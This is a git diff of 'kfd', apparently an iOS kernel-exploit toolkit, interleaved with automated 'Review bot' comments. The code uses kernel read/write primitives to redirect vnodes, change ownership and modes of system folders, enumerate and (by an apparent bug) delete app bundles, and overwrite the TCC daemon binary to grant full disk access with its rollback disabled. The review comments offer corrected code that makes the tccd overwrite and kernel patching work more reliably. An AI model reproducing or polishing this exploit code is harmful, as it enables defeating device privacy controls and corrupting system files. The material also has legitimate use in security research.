diff --git a/kfd.xcodeproj/project.pbxproj b/kfd.xcodeproj/project.pbxproj index f89a98aa..7e88be3f 100644 --- a/kfd.xcodeproj/project.pbxproj +++ b/kfd.xcodeproj/project.pbxproj @@ -24,7 +24,7 @@ D52BA4652AB582C9002E9836 /* SearchBar.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4562AB5812A002E9836 /* SearchBar.swift */; }; D52BA4662AB582C9002E9836 /* DirtyJITView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4572AB5812A002E9836 /* DirtyJITView.swift */; }; D52BA4672AB582C9002E9836 /* AppsView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4582AB5812A002E9836 /* AppsView.swift */; }; - D52BA4692AB582C9002E9836 /* ApplicationManager2.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4512AB5812A002E9836 /* ApplicationManager2.swift */; }; + D52BA4692AB582C9002E9836 /* ApplicationManager.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4512AB5812A002E9836 /* ApplicationManager.swift */; }; D52BA46B2AB5866D002E9836 /* TextField++.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA46A2AB5866D002E9836 /* TextField++.swift */; }; D52BA46D2AB586BF002E9836 /* Alert++.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA46C2AB586BF002E9836 /* Alert++.swift */; }; D58653662ABBB60E005A2379 /* vm_unaligned_copy_switch_race.c in Sources */ = {isa = PBXBuildFile; fileRef = D58653622ABBB28D005A2379 /* vm_unaligned_copy_switch_race.c */; }; 
@@ -46,6 +46,8 @@ D5AFB5BF2ABE1671006266EA /* LogView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5BE2ABE1671006266EA /* LogView.swift */; }; D5AFB5C32ABE1691006266EA /* SwiftfulLoadingIndicators in Frameworks */ = {isa = PBXBuildFile; productRef = D5AFB5C22ABE1691006266EA /* SwiftfulLoadingIndicators */; }; D5AFB5C52ABE1781006266EA /* Logger.swift in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5C42ABE1781006266EA /* Logger.swift */; }; + D5AFB71B2AC0252D006266EA /* grant_full_disk_access.m in Sources */ = {isa = PBXBuildFile; fileRef = D58653602ABBB28D005A2379 /* grant_full_disk_access.m */; }; + D5B87E8F2B00CC2E0024E70C /* FileManager.swift in Sources */ = {isa = PBXBuildFile; fileRef = D586507E2AB9F2AF005A2379 /* FileManager.swift */; }; /* End PBXBuildFile section */ /* Begin PBXFileReference section */ 
@@ -89,7 +91,7 @@ D51A38072AB56F8400C147E2 /* cs_blobs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = cs_blobs.m; sourceTree = ""; }; D51A38102AB5717500C147E2 /* files */ = {isa = PBXFileReference; lastKnownFileType = folder; path = files; sourceTree = ""; }; D52BA4352AB57EC9002E9836 /* DirtyCowKit */ = {isa = PBXFileReference; lastKnownFileType = wrapper; path = DirtyCowKit; sourceTree = ""; }; - D52BA4512AB5812A002E9836 /* ApplicationManager2.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = ApplicationManager2.swift; sourceTree = ""; }; + D52BA4512AB5812A002E9836 /* ApplicationManager.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = ApplicationManager.swift; sourceTree = ""; }; D52BA4562AB5812A002E9836 /* SearchBar.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = SearchBar.swift; sourceTree = ""; }; D52BA4572AB5812A002E9836 /* DirtyJITView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = DirtyJITView.swift; sourceTree = ""; }; D52BA4582AB5812A002E9836 /* AppsView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = AppsView.swift; sourceTree = ""; }; @@ -233,7 +235,7 @@ isa = PBXGroup; children = ( D58654902ABD55B3005A2379 /* Info.plist */, - D58654382ABD508B005A2379 /* filemanager_by akusio */, + D58654382ABD508B005A2379 /* filemanager_by_akusio */, D52BA44F2AB5812A002E9836 /* JIT */, 2948BA6A2A3162C600B2ED3C /* libkfd */, 6E75BFA62A8475790056ABDA /* fun */, @@ -304,7 +306,7 @@ isa = PBXGroup; children = ( D52BA4532AB5812A002E9836 /* DirtyJIT */, - D52BA4512AB5812A002E9836 /* ApplicationManager2.swift */, + D52BA4512AB5812A002E9836 /* ApplicationManager.swift */, ); path = JIT; sourceTree = ""; 
@@ -321,7 +323,7 @@ path = DirtyJIT; sourceTree = ""; }; - D58654382ABD508B005A2379 /* filemanager_by akusio */ = { + D58654382ABD508B005A2379 /* filemanager_by_akusio */ = { isa = PBXGroup; children = ( D58654592ABD508B005A2379 /* ViewController.m */, @@ -356,7 +358,7 @@ D586545D2ABD508B005A2379 /* Main.storyboard */, D58654662ABD508B005A2379 /* liblzfse.a */, ); - name = "filemanager_by akusio"; + name = filemanager_by_akusio; path = MiniRootFileManager15/filemanager_by_akusio; sourceTree = SOURCE_ROOT; }; @@ -448,13 +450,15 @@ isa = PBXSourcesBuildPhase; buildActionMask = 2147483647; files = ( + D5B87E8F2B00CC2E0024E70C /* FileManager.swift in Sources */, + D5AFB71B2AC0252D006266EA /* grant_full_disk_access.m in Sources */, D58653662ABBB60E005A2379 /* vm_unaligned_copy_switch_race.c in Sources */, D52BA4652AB582C9002E9836 /* SearchBar.swift in Sources */, D52BA4662AB582C9002E9836 /* DirtyJITView.swift in Sources */, D52BA4672AB582C9002E9836 /* AppsView.swift in Sources */, D58654892ABD508B005A2379 /* lzssdec.cpp in Sources */, D5AFB5B72ABE074C006266EA /* KFD-manager.m in Sources */, - D52BA4692AB582C9002E9836 /* ApplicationManager2.swift in Sources */, + D52BA4692AB582C9002E9836 /* ApplicationManager.swift in Sources */, D5AFB5C52ABE1781006266EA /* Logger.swift in Sources */, D51A380A2AB56F8400C147E2 /* vnode.m in Sources */, D51A380C2AB56F8400C147E2 /* cs_blobs.m in Sources */, diff --git a/kfd/ContentView.swift b/kfd/ContentView.swift index 177f1e13..ad3ba977 100644 --- a/kfd/ContentView.swift +++ b/kfd/ContentView.swift @@ -32,6 +32,7 @@ struct ContentView: View { @State private var isTweaksPopoverPresented = false @State private var isFilePopoverPresented = false @State private var isJITPopoverPresented = false + @State private var isSwiftFilePopoverPresented = false @State private var isLogPopoverPresented = false @State var advancedLogsTemporarilyEnabled: Bool = true 
@@ -157,6 +158,11 @@ struct ContentView: View { .onTapGesture { isJITPopoverPresented.toggle() } + Text("Swift File Manager") + .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) + .onTapGesture { + isSwiftFilePopoverPresented.toggle() + } Text("File Manager") .foregroundColor(Color(red: 0.941, green: 0.502, blue: 0.502, opacity: 1)) .onTapGesture { @@ -182,6 +188,9 @@ struct ContentView: View { .popover(isPresented: $isFilePopoverPresented, arrowEdge: .bottom) { FileManagerUIKitViewControllerWrapper() } + .popover(isPresented: $isSwiftFilePopoverPresented, arrowEdge: .bottom) { + FileManagerView() + } } } diff --git a/kfd/JIT/ApplicationManager2.swift b/kfd/JIT/ApplicationManager.swift similarity index 100% rename from kfd/JIT/ApplicationManager2.swift rename to kfd/JIT/ApplicationManager.swift diff --git a/kfd/JIT/DirtyJIT/DirtyJITView.swift b/kfd/JIT/DirtyJIT/DirtyJITView.swift index 2e547dfb..52693596 100644 --- a/kfd/JIT/DirtyJIT/DirtyJITView.swift +++ b/kfd/JIT/DirtyJIT/DirtyJITView.swift @@ -39,7 +39,6 @@ struct DirtyJITView: View { } } unsandboxing() - DispatchQueue.main.asyncAfter(deadline: .now() + 3) { UIApplication.shared.dismissAlert(animated: false) diff --git a/kfd/KFD-manager.m b/kfd/KFD-manager.m index 806a6327..2e45683b 100644 --- a/kfd/KFD-manager.m +++ b/kfd/KFD-manager.m @@ -15,6 +15,7 @@ #include "fun/cs_blobs.h" #include "fun/fun.h" #include "fun/grant_full_disk_access.h" +#include "fun/thanks_opa334dev_htrowii.h" #include "kfd-Swift.h" uint64_t orig_to_v_data = 0; 
@@ -49,6 +50,69 @@ uint64_t do_getTask(char* process) {
 return 0;
 }
+void readtmplog(NSString* file) {
+ NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
+
+ uint64_t var_tmp_vnode = getVnodeAtPathByChdir("/var/tmp");
+
+ printf("[i] /var/tmp vnode: 0x%llx\n", var_tmp_vnode);
+
+ uint64_t orig_to_v_data = createFolderAndRedirect(var_tmp_vnode, mntPath);
+
+ NSError *error;
+
+ printf("unredirecting from tmp\n");
+
+ printf("reading log\n");
+
+ NSLog(@"%@%@%@", NSHomeDirectory(), @"/Documents/mounted/", file);
+ NSString *log = [NSString stringWithContentsOfFile:[NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents/mounted/", file] encoding:NSUTF8StringEncoding error:&error];
+ NSLog(@"%@", log);
+
+ UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
+}
+
+void getappslist(void) {
+ printf("[i] chown /var/containers/Bundle/Application\n");
+ funVnodeChownFolder("/var/containers/Bundle/Application", 501, 501);
+
+ printf("[i] mounting /var/containers/Bundle/Application\n");
+
+ NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
+
+ uint64_t containers_vnode = getVnodeAtPathByChdir("/var/containers/Bundle/Application");
+ printf("[i] /var/containers/Bundle/Application vnode: 0x%llx\n", containers_vnode);
+
+ orig_to_v_data = createFolderAndRedirect(containers_vnode, mntPath);
+
+ NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
+ NSLog(@"/var/containers/Bundle/Application directory list:\n %@", dirs);
+
+ UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
+
+ NSString *appstage1mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/appstage1/"];
+ if (![[NSFileManager defaultManager] fileExistsAtPath:appstage1mntPath]) {
+ [[NSFileManager defaultManager] createDirectoryAtPath:appstage1mntPath withIntermediateDirectories:YES attributes:nil error:nil];
+ }
+ NSString *appstage2mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/appstage2/"];
+ if (![[NSFileManager defaultManager] fileExistsAtPath:appstage2mntPath]) {
+ [[NSFileManager defaultManager] createDirectoryAtPath:appstage2mntPath withIntermediateDirectories:YES attributes:nil error:nil];
+ }
+
+ for(NSString *dir in dirs) {
+ NSString *path = [NSString stringWithFormat:@"%s/%@", "/var/containers/Bundle/Application", dir];
+ [[NSFileManager defaultManager] removeItemAtPath:path error:nil];
+ NSLog(@"full path:\n %@", path);
+ //funVnodeChownFolder((char *) [path UTF8String], 501, 501);
+ NSString *appmntPath = [NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents/appstage1/", dir];
+ uint64_t containers_vnode = getVnodeAtPathByChdir((char *) [path UTF8String]);
+ createFolderAndRedirect(containers_vnode, appmntPath);
+ NSArray* targetdirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:appmntPath error:NULL];
+ NSLog(@"appstage1 directory list: %@", targetdirs);
+ }
+}
+
 void prepare(void) {
 _offsets_init();
@@ -79,6 +143,23 @@ void prepare(void) {
 //});
 }
+uint64_t mountusrDir(void) {
+
+ NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
+
+ uint64_t libexec_vnode = getVnodeAtPathByChdir("/var/containers/Bundle/Application/CF553F26-ED5C-44A5-8AE5-0C1267BFFA8C/Tips.app");
+ printf("[i] folder vnode: 0x%llx\n", libexec_vnode);
+
+ orig_to_v_data = createFolderAndRedirect(libexec_vnode, mntPath);
+
+ NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
+ NSLog(@"Tips directory list:\n %@", dirs);
+
+ //UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
+
+ return orig_to_v_data;
+}
+
 void do_tasks(void) {
 _offsets_init();
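Review bot: The loop at the end of `getappslist` calls `[[NSFileManager defaultManager] removeItemAtPath:path error:nil]` on every entry of `/var/containers/Bundle/Application` right after that directory was chowned to 501:501, so if the unlink is permitted it recursively deletes the very app bundles the function is enumerating, and the nil error pointer means nothing would report it. Nothing in the function suggests deletion is intended (the next lines log the path and redirect into it), so that line should go. The per-app `createFolderAndRedirect(containers_vnode, appmntPath)` also discards its return value, so unlike the parent redirect above it can never be undone with `UnRedirectAndRemoveFolder` — if the redirects are meant to persist for a later stage, keep the values; otherwise restore per iteration as below — and `getVnodeAtPathByChdir` is not checked for the -1 failure value that `funVnodeChmodFolder` tests in this same commit. In `readtmplog` the local `uint64_t orig_to_v_data` shadows the file-level global of the same name and `error` is never inspected after `stringWithContentsOfFile:`; acceptable for a debug helper, but worth a comment. Both functions are complete within the hunk.

```objc
// … unchanged: chown, parent redirect, appstage directory creation …
for(NSString *dir in dirs) {
    NSString *path = [NSString stringWithFormat:@"%s/%@", "/var/containers/Bundle/Application", dir];
    NSLog(@"full path:\n %@", path);
    NSString *appmntPath = [NSString stringWithFormat:@"%@%@%@", NSHomeDirectory(), @"/Documents/appstage1/", dir];
    uint64_t app_vnode = getVnodeAtPathByChdir((char *) [path UTF8String]);
    if (app_vnode == -1) {
        printf("[-] Unable to get vnode, path: %s\n", [path UTF8String]);
        continue;
    }
    uint64_t app_orig_to_v_data = createFolderAndRedirect(app_vnode, appmntPath);
    NSArray* targetdirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:appmntPath error:NULL];
    NSLog(@"appstage1 directory list: %@", targetdirs);
    // keep app_orig_to_v_data instead if the redirect must outlive this loop
    UnRedirectAndRemoveFolder(app_orig_to_v_data, appmntPath);
}
```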
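Review bot: `mountusrDir` now hard-codes a container UUID (`CF553F26-…/Tips.app`) that only exists on the author's device, and hands the raw `getVnodeAtPathByChdir` result to `createFolderAndRedirect` without checking for the -1 failure value that `funVnodeChmodFolder` checks in this same commit, so on any other device it redirects using a bogus vnode. Guard it before the redirect: `if (libexec_vnode == -1) { printf("[-] Tips.app bundle not found\n"); return 0; }` (the removed `/usr` version returned 0, so callers presumably tolerate that — verify against `unmountselectedDir`). With `UnRedirectAndRemoveFolder` commented out the redirect is intentionally left in place and only the saved `v_data` is returned, so the name no longer describes the function; rename it or add a comment stating that the caller must pass the return value to `unmountselectedDir`. The function is complete within the hunk.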
@@ -96,11 +177,23 @@ void do_tasks(void) {
 funUcred(selfProc);
 funProc(selfProc);
 printf("[i] pid: %d\n", getpid());
- funCSFlags("kfd");
+ //funCSFlags("kfd");
+ //funTask("kfd");
 mach_port_t host_self = mach_host_self();
 printf("[i] mach_host_self: 0x%x\n", host_self);
 fun_ipc_entry_lookup(host_self);
- fun_nvram_dump();
+ //fun_nvram_dump();
+ //readtmplog(@"ps.log");
+ usleep(1000);
+ //getappslist();
+ printf("[i] vnode: %llx\n", getVnodeAtPathByChdir("/var/containers/Bundle/Application/856A4230-C48C-4F6E-BAA4-E0BD1084AE6C/Books.app"));
+ printf("[i] vnode: %llx\n", findChildVnodeByVnode(getVnodeAtPathByChdir("/var/containers/Bundle/Application/856A4230-C48C-4F6E-BAA4-E0BD1084AE6C/Books.app"), "Books.app"));
+ printf("[i] vnode: %llx\n", findChildVnodeByVnode(getVnodeAtPathByChdir("/var/mobile"), "TCC.framework"));
+
+ //funVnodeOverwriteFile("/System/Library/PrivateFrameworks/TCC.framework/Support/tccd", "/Developer/System/Library/PrivateFrameworks/TCC.framework/Support/tccd_ori");
+ //kfd_grant_full_disk_access(^(NSError* error) {
+ // NSLog(@"[-] grant_full_disk_access returned error: %@", error);
+ //});
 }
 uint64_t mountselectedDir(NSString* path) {
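Review bot: The three new `printf("[i] vnode: ...")` lines resolve a device-specific Books.app container path (`856A4230-…`) and pass the raw `getVnodeAtPathByChdir` result straight into `findChildVnodeByVnode` without checking for the -1 failure value that `funVnodeChmodFolder` checks elsewhere in this commit, so on any other device the child lookup walks from a bogus vnode. The third call searches for `TCC.framework` under `/var/mobile`, while the commented-out line just below places tccd under `/System/Library/PrivateFrameworks`; that reads like a leftover experiment rather than intent — confirm or drop it. The `usleep(1000)` carries no comment saying what it waits for. If the Books.app lookups are to stay, resolve the path once and guard it as below. `do_tasks` starts before the hunk; its closing brace is inside it.

```objc
// … unchanged: funUcred / funProc / mach_host_self lookup …
uint64_t books_vnode = getVnodeAtPathByChdir("/var/containers/Bundle/Application/856A4230-C48C-4F6E-BAA4-E0BD1084AE6C/Books.app");
if (books_vnode != -1) {
    printf("[i] vnode: %llx\n", books_vnode);
    printf("[i] vnode: %llx\n", findChildVnodeByVnode(books_vnode, "Books.app"));
} else {
    printf("[-] Books.app bundle not found on this device\n");
}
```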
@@ -121,25 +214,6 @@ uint64_t mountselectedDir(NSString* path) {
 return orig_to_v_data;
 }
-uint64_t mountusrDir(void) {
-
- printf("[i] mounting /usr\n");
-
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-
- uint64_t libexec_vnode = getVnodeAtPathByChdir("/usr");
- printf("[i] /usr vnode: 0x%llx\n", libexec_vnode);
-
- orig_to_v_data = createFolderAndRedirect(libexec_vnode, mntPath);
-
- NSArray* dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/usr directory list:\n %@", dirs);
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- return 0;
-}
-
 void unmountselectedDir(uint64_t orig_to_v_data, NSString* mntPath) {
 printf("[i] orig_to_v_data: %llx", orig_to_v_data);
 onlyUnRedirectFolder(orig_to_v_data, mntPath);
diff --git a/kfd/files/PersistenceHelper_Embedded b/kfd/files/PersistenceHelper_Embedded
new file mode 100644
index 00000000..9fbec600
Binary files /dev/null and b/kfd/files/PersistenceHelper_Embedded differ
diff --git a/kfd/fun/fun.m b/kfd/fun/fun.m
index a551e913..4fe5c40b 100644
--- a/kfd/fun/fun.m
+++ b/kfd/fun/fun.m
@@ -106,8 +106,8 @@ int funTask(char* process) {
 #define TFRO_PAC_EXC_FATAL 0x00010000 /* task is marked a corpse if a PAC exception occurs */
 #define TFRO_PAC_ENFORCE_USER_STATE 0x01000000 /* Enforce user and kernel signed thread state */
- uint32_t t_flags_ro = kread32(proc_ro + off_p_ro_t_flags_ro);
- printf("[i] %s proc->proc_ro->t_flags_ro: 0x%x\n", process, t_flags_ro);
+ //uint32_t t_flags_ro = kread32(proc_ro + off_p_ro_t_flags_ro);
+ //printf("[i] %s proc->proc_ro->t_flags_ro: 0x%x\n", process, t_flags_ro);
 return 0;
 }
diff --git a/kfd/fun/grant_full_disk_access.m b/kfd/fun/grant_full_disk_access.m
index 83afc765..9fc068b2 100644
--- a/kfd/fun/grant_full_disk_access.m
+++ b/kfd/fun/grant_full_disk_access.m
@@ -15,7 +15,7 @@
 #import "proc.h"
 #import "offsets.h"
-//#import "krw.h"
+#import "krw.h"
 #import "vnode.h"
 typedef NSObject* xpc_object_t;
@@ -328,7 +328,7 @@ static bool overwrite_file(int fd, NSData* sourceData) {
 kwrite32(to_vnode + off_vnode_v_writecount, to_vnode_v_writecount + 1);
 printf("[+] overwrite_file vnode->v_writecount: %d\n", kread32(to_vnode + off_vnode_v_writecount));
 }
-
+ /*
 for (int off = 0; off < sourceData.length; off += 0x4000) {
 bool success = false;
 for (int i = 0; i < 2; i++) {
@@ -344,7 +344,9 @@ static bool overwrite_file(int fd, NSData* sourceData) {
 kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag);
 return false;
 }
- }
+ }*/
+ [sourceData writeToFile: [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/tccd"] atomically: true];
+ funVnodeOverwriteFile((char *) [[NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/tccd"] UTF8String], "/System/Library/PrivateFrameworks/TCC.framework/Support/tccd");
 kwrite32(fileglob + off_fg_flag, O_RDONLY);
 kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag);
 return true;
@@ -373,7 +375,7 @@ static void grant_full_disk_access_impl(void (^completion)(NSString* extension_t
 }
 if (!overwrite_file(fd, sourceData)) {
- overwrite_file(fd, originalData);
+ //overwrite_file(fd, originalData);
 munmap(targetMap, targetLength);
 completion( nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
diff --git a/kfd/fun/offsets.m b/kfd/fun/offsets.m
index 8c9420a4..491f04dd 100644
--- a/kfd/fun/offsets.m
+++ b/kfd/fun/offsets.m
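Review bot: `overwrite_file` now ignores the result of `writeToFile:atomically:` and of `funVnodeOverwriteFile(...)` and still ends in an unconditional `return true;`, so the `if (!overwrite_file(fd, sourceData))` path in `grant_full_disk_access_impl` can never fire and a failed copy onto `/System/Library/PrivateFrameworks/TCC.framework/Support/tccd` is reported as success — for a system daemon binary that is exactly where a silent failure must not happen. The staged copy is also left behind in `Documents/tccd`, and the `fd` parameter is no longer what receives the data, which a comment should state. Check both results and propagate them as below (this assumes `funVnodeOverwriteFile` follows the 0-on-success / -1-on-failure convention of `funVnodeChmod` — confirm in vnode.m). The function starts before the hunk.

```objc
// … unchanged: v_writecount bump …
NSString *stagedPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/tccd"];
bool ok = [sourceData writeToFile:stagedPath atomically:YES];
if (ok) {
    ok = (funVnodeOverwriteFile((char *) [stagedPath UTF8String], "/System/Library/PrivateFrameworks/TCC.framework/Support/tccd") == 0);
    [[NSFileManager defaultManager] removeItemAtPath:stagedPath error:nil];
}
kwrite32(fileglob + off_fg_flag, O_RDONLY);
kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag);
return ok;
```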
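Review bot: Commenting out `overwrite_file(fd, originalData);` removes the rollback that put the original tccd back after a failed overwrite, so a partial write now leaves the TCC daemon binary corrupted while the completion reports an error as if nothing had changed. Because `overwrite_file` in this same commit always returns true the branch is currently dead, but once that return value is fixed the restore has to come back, e.g. `if (!overwrite_file(fd, originalData)) { NSLog(@"[-] failed to restore original tccd"); }`. If `originalData` is no longer used anywhere else the compiler will now warn about it — confirm. `grant_full_disk_access_impl` starts before the hunk and ends after it.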
@@ -85,17 +85,17 @@ void _offsets_init(void) { //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 off_p_list_le_prev = 0x8; off_p_proc_ro = 0x18; - off_p_ppid = 0x20; - off_p_original_ppid = 0x24; - off_p_pgrpid = 0x28; + off_p_ppid = 0x20;//ok + off_p_original_ppid = 0x24;//ok + off_p_pgrpid = 0x28;//ok off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; - off_p_sessionid = 0x44; - off_p_puniqueid = 0x48; + off_p_sessionid = 0x44;//ok + off_p_puniqueid = 0x48;//ok off_p_pid = 0x60; off_p_pfd = 0xf8; off_p_textvp = 0x350; @@ -177,25 +177,25 @@ void _offsets_init(void) { //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 off_p_list_le_prev = 0x8;//ok off_p_proc_ro = 0x18; - off_p_ppid = 0x20; - off_p_original_ppid = 0x24; - off_p_pgrpid = 0x28; + off_p_ppid = 0x20;//ok + off_p_original_ppid = 0x24;//ok + off_p_pgrpid = 0x28;//ok off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; - off_p_sessionid = 0x44; - off_p_puniqueid = 0x48; + off_p_sessionid = 0x44;//ok + off_p_puniqueid = 0x48;//ok off_p_pid = 0x60;//ok off_p_pfd = 0xf8;//p_fd__fd_ofiles? ok off_p_textvp = 0x548; off_p_name = 0x579;//ok //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_ro.h#L59 - off_p_ro_p_csflags = 0x1c; - off_p_ro_p_ucred = 0x20; + off_p_ro_p_csflags = 0x1c;//ok + off_p_ro_p_ucred = 0x20;//ok off_p_ro_pr_proc = 0; off_p_ro_pr_task = 0x8; off_p_ro_t_flags_ro = 0x78; @@ -216,7 +216,7 @@ void _offsets_init(void) { off_cr_flags = 0x5c; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/kern/task.h#L280 - off_task_t_flags = 0x3D0; + off_task_t_flags = 0x3D0;//ok //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/filedesc.h#L138 off_fd_ofiles = 0; 
diff --git a/kfd/fun/vnode.h b/kfd/fun/vnode.h
index a6900b0b..d1300d64 100644
--- a/kfd/fun/vnode.h
+++ b/kfd/fun/vnode.h
@@ -122,4 +122,5 @@ uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from);
 uint64_t funVnodeOverwriteFileUnlimitSizeWithVnode(uint64_t to_vnode, char* from);
 uint64_t funVnodeChownFolder(char* filename, uid_t uid, gid_t gid);
+uint64_t funVnodeChmodFolder(char* filename, mode_t mode);
 uint64_t funVnodeFolderForFileManager(NSString* filename, uid_t uid, gid_t gid);
diff --git a/kfd/fun/vnode.m b/kfd/fun/vnode.m
index c714c05f..3f69f436 100644
--- a/kfd/fun/vnode.m
+++ b/kfd/fun/vnode.m
@@ -153,6 +153,7 @@ uint64_t funVnodeFolderForFileManager(NSString* filename, uid_t uid, gid_t gid)
 //funVnodeChownFolder((char *) [filename UTF8String], uid, gid);
 return 0;
 }
+
 uint64_t funVnodeChmod(char* filename, mode_t mode) {
 uint64_t vnode = getVnodeAtPath(filename);
 if(vnode == -1) {
@@ -174,6 +175,27 @@ uint64_t funVnodeChmod(char* filename, mode_t mode) {
 return 0;
 }
+uint64_t funVnodeChmodFolder(char* filename, mode_t mode) {
+ uint64_t vnode = getVnodeAtPathByChdir(filename);
+ if(vnode == -1) {
+ printf("[-] Unable to get vnode, path: %s", filename);
+ return -1;
+ }
+
+ uint64_t v_data = kread64(vnode + off_vnode_v_data);
+ uint32_t v_mode = kread32(v_data + 0x88);
+
+ printf("[i] Patching %s vnode->v_mode %o -> %o\n", filename, v_mode, mode);
+ kwrite32(v_data+0x88, mode);
+
+ struct stat file_stat;
+ if(stat(filename, &file_stat) == 0) {
+ printf("[+] %s mode: %o\n", filename, file_stat.st_mode);
+ }
+
+ return 0;
+}
+
 uint64_t findRootVnode(void) {
 uint64_t launchd_proc = getProc(1);
diff --git a/kfd/libkfd/info/dynamic_info.h b/kfd/libkfd/info/dynamic_info.h
index 760e7ef0..503b0ea8 100644
--- a/kfd/libkfd/info/dynamic_info.h
+++ b/kfd/libkfd/info/dynamic_info.h
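Review bot: `kwrite32(v_data+0x88, mode);` in `funVnodeChmodFolder` replaces the whole mode word that `v_mode` was just read from, so a caller passing plain permission bits (e.g. `0777`) also wipes the file-type bits (`S_IFDIR`) that `v_mode` carried; preserve them with `kwrite32(v_data + 0x88, (v_mode & S_IFMT) | (mode & ~S_IFMT));`. The `0x88` offset into the filesystem-private `v_data` is a bare magic number while every other structure offset in this project is an `off_*` variable from offsets.m (cf. `off_vnode_v_data` on the line above); hoist it there, especially if `funVnodeChmod` above uses the same constant — its body lies outside the hunk. The failure `printf` lacks a trailing `\n`, and returning `-1` through a `uint64_t` matches `funVnodeChmod` but is easy to mistest. The function is complete within the hunk.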
@@ -104,86 +104,6 @@ struct dynamic_info { }; const struct dynamic_info kern_versions[] = { - //iPhone SE 2020 iOS 16.6 beta1 - { - .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", - .fileglob__fg_ops = 0x28, - .fileglob__fg_data = 0x40 - 8, - .fileops__fo_kqfilter = 0x30, - // .fileproc__fp_iocount = 0x0000, - // .fileproc__fp_vflags = 0x0004, - // .fileproc__fp_flags = 0x0008, - // .fileproc__fp_guard_attrs = 0x000a, - // .fileproc__fp_glob = 0x0010, - // .fileproc__fp_guard = 0x0018, - // .fileproc__object_size = 0x0020, - .fileproc_guard__fpg_guard = 0x8, - .kqworkloop__kqwl_state = 0x10, - .kqworkloop__kqwl_p = 0x18, - .kqworkloop__kqwl_owner = 0xd0, - .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, - .kqworkloop__object_size = 0x108, - .pmap__tte = 0x0, - .pmap__ttep = 0x8, - .proc__p_list__le_next = 0x0, - .proc__p_list__le_prev = 0x8, - .proc__p_pid = 0x60, - .proc__p_fd__fd_ofiles = 0xf8, - .proc__object_size = 0x730, - .pseminfo__psem_usecount = 0x04, - .pseminfo__psem_uid = 0x0c, - .pseminfo__psem_gid = 0x10, - .pseminfo__psem_name = 0x14, - .pseminfo__psem_semobject = 0x38, - // .psemnode__pinfo = 0x0000, - // .psemnode__padding = 0x0008, - // .psemnode__object_size = 0x0010, - .semaphore__owner = 0x28, - .specinfo__si_rdev = 0x18, - .task__map = 0x28, - .task__threads__next = 0x80 - 0x28, - .task__threads__prev = 0x80 - 0x28 + 8, - .task__itk_space = 0x300, - .task__object_size = 0x628, - .thread__task_threads__next = 0x378 - 0x18, - .thread__task_threads__prev = 0x378 - 0x18 + 8, - .thread__map = 0x378, - .thread__thread_id = 0x410, - .thread__object_size = 0x4b8, - .uthread__object_size = 0x200, - .vm_map_entry__links__prev = 0x00, - .vm_map_entry__links__next = 0x08, - .vm_map_entry__links__start = 0x10, - .vm_map_entry__links__end = 0x18, - 